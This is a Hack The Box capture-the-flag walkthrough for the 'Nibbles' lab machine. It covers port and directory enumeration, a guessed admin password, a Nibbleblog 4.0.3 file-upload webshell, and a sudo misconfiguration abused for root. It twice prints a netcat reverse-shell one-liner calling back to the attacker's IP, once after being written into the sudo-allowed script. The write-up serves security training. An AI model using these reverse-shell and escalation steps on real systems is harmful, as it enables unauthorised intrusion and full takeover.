HTB - Nibbles

Nibbles

Getting Root

1. We notice that the application is running Nibble-blog version 4.0.3 which is vulnerable to file upload

2. We upload a webshell and get access to the box as user nibbler who has full sudo access to a bash script on his home directory

Tools Used:

nmap, dirsearch, searchploit,

Nmap

nmap -sC -sV -p- -oA nmap/allports 10.10.10.75                  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 21:50 EDT
Nmap scan report for 10.10.10.75
Host is up (0.061s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Dirsearch

sudo dirsearch -u http://10.10.10.75/nibbleblog -E                                                                                                            
                                                                                                                                                                                              
 _|. _ _  _  _  _ _|_    v0.3.9                                                                                                                                                               
(_||| _) (/_(_|| (_| )                                                                                                                                                                        
                                                                                                                                                                                              
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8674                                                                                  
                                                                                                                                                                                              
Error Log: /opt/dirsearch/logs/errors-20-04-13_21-56-23.log                                                                                                                                   
                                                                                                                                                                                              
Target: http://10.10.10.75/nibbleblog                                                                                                                                                         

[21:56:23] Starting: 
[21:56:25] 403 -  308B  - /nibbleblog/.ht_wsr.txt
[21:56:25] 403 -  301B  - /nibbleblog/.hta
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess-dev
[21:56:25] 403 -  312B  - /nibbleblog/.htaccess-local
[21:56:25] 403 -  312B  - /nibbleblog/.htaccess-marco
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess.BAK
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess.bak1
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess.old
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess.orig
[21:56:25] 403 -  313B  - /nibbleblog/.htaccess.sample
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess.save
[21:56:25] 403 -  310B  - /nibbleblog/.htaccess.txt
[21:56:25] 403 -  312B  - /nibbleblog/.htaccess_extra
[21:56:25] 403 -  311B  - /nibbleblog/.htaccess_orig
[21:56:25] 403 -  309B  - /nibbleblog/.htaccess_sc
[21:56:25] 403 -  309B  - /nibbleblog/.htaccessBAK
[21:56:25] 403 -  309B  - /nibbleblog/.htaccessOLD
[21:56:25] 403 -  310B  - /nibbleblog/.htaccessOLD2
[21:56:25] 403 -  307B  - /nibbleblog/.htaccess~
[21:56:25] 403 -  305B  - /nibbleblog/.htgroup
[21:56:25] 403 -  310B  - /nibbleblog/.htpasswd-old
[21:56:25] 403 -  311B  - /nibbleblog/.htpasswd_test
[21:56:25] 403 -  307B  - /nibbleblog/.htpasswds
[21:56:25] 403 -  305B  - /nibbleblog/.htusers
[21:56:31] 301 -  321B  - /nibbleblog/admin  ->  http://10.10.10.75/nibbleblog/admin/
[21:56:31] 200 -    1KB - /nibbleblog/admin.php 
[21:56:31] 200 -    2KB - /nibbleblog/admin/
[21:56:32] 403 -  312B  - /nibbleblog/admin/.htaccess
[21:56:32] 200 -    2KB - /nibbleblog/admin/?/login
[21:56:32] 301 -  332B  - /nibbleblog/admin/js/tinymce  ->  http://10.10.10.75/nibbleblog/admin/js/tinymce/
[21:56:32] 200 -    2KB - /nibbleblog/admin/js/tinymce/
[21:56:50] 301 -  323B  - /nibbleblog/content  ->  http://10.10.10.75/nibbleblog/content/       
[21:56:57] 200 -    3KB - /nibbleblog/index.php                                                 
[21:56:57] 200 -    3KB - /nibbleblog/index.php/login/
[21:56:57] 200 -   78B  - /nibbleblog/install.php
[21:56:58] 301 -  325B  - /nibbleblog/languages  ->  http://10.10.10.75/nibbleblog/languages/   
[21:56:59] 200 -   34KB - /nibbleblog/LICENSE.txt
[21:57:06] 301 -  323B  - /nibbleblog/plugins  ->  http://10.10.10.75/nibbleblog/plugins/
[21:57:08] 200 -    5KB - /nibbleblog/README    
[21:57:14] 301 -  322B  - /nibbleblog/themes  ->  http://10.10.10.75/nibbleblog/themes/         
                                                
Task Completed

The interesting stuff: [21:56:31] 200 - 1KB - /nibbleblog/admin.php [21:56:50] 301 - 323B - /nibbleblog/content http://10.10.10.75/nibbleblog/content/ [21:57:08] 200 - 5KB - /nibbleblog/README

# Found under
http://10.10.10.75/nibbleblog/README

====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01


# Found under
http://10.10.10.75/nibbleblog/content/private/users.xml
Username: admin
( see screeshot below)

Checking the admin page, we were able to guess the password.

# On the admin page
Username: admin
Password: nibbles

# Discovered the creds by guessing

http://10.10.10.75/nibbleblog/admin.php

Searchsploit

searchsploit Nibbleblog                                                                                                                                       
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                       |  Path                                  
                                                                                                                                                     | (/usr/share/exploitdb/)                
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections                                                                                                               | exploits/php/webapps/35865.txt         
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                                                                | exploits/php/remote/38489.rb           
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Exploit

We find an exploit for our version but using metasploit, however a simple google search takes use to the following POC

NibbleBlog 4.0.3: Code Execution - Cureblogcuresec.com

3. Proof of Concept

    Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
    Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
    Upload PHP shell, ignore warnings
    Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.  

According to the POC we should be able to upload a php file under the My Image plugin and ignore all the warnings. In order to do to do this we must be able to login to the admin page.

We know the user admin, but we don't have a password. A few manual login tries and we can guess the password as nibbles. Now we can attempt to upload our php webshell.

Upload the webshell

We noticed the warnings and ignore them

Visiting the following page as described by the POC takes to the webshell

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

We execute the following to get a reverse shell on the box

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9001>/tmp/f

Privilege Escalation

# Checking sudo permissions, we should be able to run a bash script with sudo
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l                                                                                                            
<ml/nibbleblog/content/private/plugins/my_image$ sudo -l                                                                                                                                      
sudo: unable to resolve host Nibbles: Connection timed out                                                                                                                                    
Matching Defaults entries for nibbler on Nibbles:                                                                                                                                             
    env_reset, mail_badpass,                                                                                                                                                                  
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                                  
                                                                                                                                                                                              
User nibbler may run the following commands on Nibbles:                                                                                                                                       
    '(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'  


# Checking the dircetory of the file
nibbler@Nibbles:/home/nibbler$ ls -la
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt

# we dont see the personal directory but we see a zip file
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  


# We can see we have full permissions of the bash script
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh


# Edited the bash scrip with the following contents
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9002>/tmp/f' > monitor.sh

# Executed the script with sudo
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh

# Got a shell as root
rlwrap nc -lnvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:45840.
# id
uid=0(root) gid=0(root) groups=0(root)
#